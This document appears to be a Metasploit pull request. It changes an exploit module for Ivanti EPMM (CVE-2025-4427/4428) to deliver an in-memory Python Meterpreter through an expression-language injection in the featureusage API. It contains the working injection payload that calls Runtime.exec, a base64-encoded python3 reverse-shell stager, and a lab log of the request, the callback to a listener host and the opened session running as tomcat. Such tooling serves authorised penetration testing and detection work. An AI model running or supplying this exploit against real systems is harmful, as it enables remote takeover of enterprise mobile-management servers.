### PR TITLE
Switch to in-memory python over fetch payloads

### DIFF
--- a/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
+++ b/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'CERT-EU', # Original discovery
-          'Sonny Macdonald & Piotr Bazydlo', # First published PoC
+          'Sonny Macdonald', # First Published PoC
+          'Piotr Bazydlo', # First published PoC
           'remmons-r7' # MSF Exploit
         ],
         'References' => [
@@ -40,17 +41,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2025-05-13',
         # Runs as the 'tomcat' user
         'Privileged' => false,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD],
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON], # Tested appliance has Python 3.4.9
         'DefaultTarget' => 0,
         'Targets' => [ [ 'Default', {} ] ],
-        'DefaultOptions' => {
-          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
-          'FETCH_WRITABLE_DIR' => '/var/tmp',
-          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
-          # Specifying x64 here to ensure a sane default
-          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
-        },
         'Notes' => {
           # Confirmed to work multiple times in a row and concurrently
           'Stability' => [CRASH_SAFE],
@@ -82,61 +76,25 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd)
-    # Since the execution context only supports one command at a time, split on fetch payload semicolons
-    commands = cmd.split(';')
-    resp = nil
+  def execute_command(command)
+    payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
 
-    commands.each_with_index do |command, index|
-      command = command.strip
-      next if command.empty?
+    vprint_status("Sending template payload: #{payload}")
 
-      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
-      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
-      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
-      # The expression language execution context doesn't like it unless there's a space, so we add one
-      command = command.gsub('&', ' &')
-
-      vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
-
-      # Non-blind payload reportedly being used in the wild, returns stdout in response body
-      payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
-
-      vprint_status("Sending template payload: #{payload}")
-
-      resp = send_request_cgi(
-        'method' => 'GET',
-        # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
-        'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
-        'vars_get' => {
-          'format' => payload
-        },
-        # Setting this timeout lower than the default, since the third request will not receive a response
-        # Per https://github.com/rapid7/metasploit-framework/issues/12004
-        'timeout' => 7.5
-      )
-
-      # The third fetch payload command (executing meterpreter) should hang and fail to respond
-      # If there's no response and it's not the third fetch payload, the exploit failed
-      if index != 2
-        unless resp
-          fail_with(Failure::Unknown, "Failed to execute command part #{index + 1}: #{command}")
-        end
-
-        vprint_status("Command part #{index + 1} response: #{resp.body}")
-
-      else
-        vprint_status('No command part 3 response expected')
-      end
-    end
-
-    resp
+    send_request_cgi(
+      'method' => 'GET',
+      # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
+      'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
+      'vars_get' => {
+        'format' => payload
+      }
+    )
   end
 
   def exploit
-    # We pass the encoded payload to execute_command
-    # That will split it up into three commands to execute, and it'll also handle error conditions
     vprint_status('Attempting to execute payload')
-    execute_command(payload.encoded)
+    base64_payload = Base64.urlsafe_encode64(payload.encoded)
+    cmd = "python3 -c exec(__import__(\"base64\").b64decode(\"#{base64_payload}\"))"
+    execute_command(cmd)
   end
 end


### PR DESCRIPTION
Swapping to a python Meterpreter saves a lot of pain.
```
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options

Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, so
                                         cks4, socks5, socks5h, http
   RHOSTS     10.5.132.244     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Ivanti EPMM
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to execute payload
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('python3 -c exec(__import__("base64").b64decode("ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVVFMUx4REFRUFRlL0lyY2tHRU83dG50WXJDRGlRVVFFMTV1SXRNbW9vV2tTa3F4V3hmOXVReGJuTU1PYmVmUG1ROC9laFlTamt4TWsvbTMweU1jaHdyYmxNWVdEVER6cEdkQ3JDM2pCMnVJdzJEZWdUYzEycUVyaGEvVlY3RXV6S0lGdStCSHY3Njl1WC9hUEQ5ZVhkeXp6aEhUV2dreVVrcVlXbldqT09yR3BHOExiMVZpbWpBR0dDVld3U1BBcGErZmhJaG9BVHp1R1RGOTJFZ2ZyQnpsUmNuRkRlQlFCNUFkZEJaN3FaNlQ2SXpZTWZiNXJBOWlBcFlxZG0xVk9uZnhYVDB1YUlWaEEwbnkyVUNEZDdBUEVTTXNIeExodGMxSkJadklmRXNrdS9qTDBCOGd3WHZBPScpWzBdKSkp"))').getInputStream()).useDelimiter('%5C%5CA').next()}
####################
# Request:
####################
GET /mifs/rs/api/v2/featureusage?format=%24%7b%27%27.getClass%28%29.forName%28%27java.util.Scanner%27%29.getConstructor%28%27%27.getClass%28%29.forName%28%27java.io.InputStream%27%29%29.newInstance%28%27%27.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%29.invoke%28null%29.exec%28%27python3%20-c%20exec%28__import__%28%22base64%22%29.b64decode%28%22ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVVFMUx4REFRUFRlL0lyY2tHRU83dG50WXJDRGlRVVFFMTV1SXRNbW9vV2tTa3F4V3hmOXVReGJuTU1PYmVmUG1ROC9laFlTamt4TWsvbTMweU1jaHdyYmxNWVdEVER6cEdkQ3JDM2pCMnVJdzJEZWdUYzEycUVyaGEvVlY3RXV6S0lGdStCSHY3Njl1WC9hUEQ5ZVhkeXp6aEhUV2dreVVrcVlXbldqT09yR3BHOExiMVZpbWpBR0dDVld3U1BBcGErZmhJaG9BVHp1R1RGOTJFZ2ZyQnpsUmNuRkRlQlFCNUFkZEJaN3FaNlQ2SXpZTWZiNXJBOWlBcFlxZG0xVk9uZnhYVDB1YUlWaEEwbnkyVUNEZDdBUEVTTXNIeExodGMxSkJadklmRXNrdS9qTDBCOGd3WHZBPScpWzBdKSkp%22%29%29%27%29.getInputStream%28%29%29.useDelimiter%28%27%255C%255CA%27%29.next%28%29%7d HTTP/1.1
Host: 10.5.132.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0


[*] Sending stage (24768 bytes) to 10.5.132.244
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.244:50322) at 2025-06-03 13:38:16 -0500
####################
# Response:
####################
No response received

meterpreter > sysinfo
Computer        : ivanti.example.local
OS              : Linux 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: tomcat
meterpreter > exit

```